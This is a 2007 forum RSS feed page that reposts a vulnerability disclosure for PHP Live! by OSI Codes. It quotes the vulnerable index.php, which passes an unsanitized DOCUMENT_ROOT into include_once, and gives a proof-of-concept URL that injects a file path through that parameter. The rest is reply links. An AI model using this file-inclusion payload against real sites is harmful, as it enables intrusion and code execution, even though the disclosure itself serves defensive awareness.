<![CDATA[Latest posts for the topic "osi codes - php live"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net osi codes - php live http://Aria-Security.Net Persian Security Network ________________________________ Source Code: <? /******************************************************* * COPYRIGHT OSI CODES - PHP Live! *******************************************************/ session_start() ; $l = "" ; // try to get cookie value first if ( isset( $HTTP_COOKIE_VARS['COOKIE_PHPLIVE_SITE'] ) ) { $l = $HTTP_COOKIE_VARS['COOKIE_PHPLIVE_SITE'] ; } if ( isset( $HTTP_GET_VARS['l'] ) ) { $l = $HTTP_GET_VARS['l'] ; } if ( isset( $HTTP_POST_VARS['l'] ) ) { $l = $HTTP_POST_VARS['l'] ; } if ( !file_exists( "./web/conf-init.php" ) ) { HEADER( "location: setup/index.php" ) ; exit ; } include_once("./web/conf-init.php") ; if ( file_exists( "web/$l/$l-conf-init.php" ) && $l ) include_once("./web/$l/$l-conf-init.php") ; include_once("$DOCUMENT_ROOT/API/Util_Error.php") ; include_once("$DOCUMENT_ROOT/system.php") ; include_once("$DOCUMENT_ROOT/lang_packs/$LANG_PACK.php") ; include_once("$DOCUMENT_ROOT/web/VERSION_KEEP.php") ; include_once("$DOCUMENT_ROOT/API/Util_CleanFiles.php") ; include_once("$DOCUMENT_ROOT/API/sql.php" ) ; include_once("$DOCUMENT_ROOT/API/Users/get.php") ; include_once("$DOCUMENT_ROOT/API/Users/update.php") ; include_once("$DOCUMENT_ROOT/API/Chat/remove.php") ; include_once("$DOCUMENT_ROOT/API/ASP/get.php") ; ?> Affected file: Index.php Poc: /index.php?DOCUMENT_ROOT=file.txt ? Credits: Aria-Security The-0utl4w Received on Oct 24 2007 ]]> /hvaonline/posts/list/15546.html#92867 /hvaonline/posts/list/15546.html#92867 GMT Re: osi codes - php live /hvaonline/posts/list/15546.html#92868 /hvaonline/posts/list/15546.html#92868 GMT Re: osi codes - php live /hvaonline/posts/list/15546.html#92993 /hvaonline/posts/list/15546.html#92993 GMT Re: osi codes - php live /hvaonline/posts/list/15546.html#93043 /hvaonline/posts/list/15546.html#93043 GMT Re: osi codes - php live /hvaonline/posts/list/15546.html#98461 /hvaonline/posts/list/15546.html#98461 GMT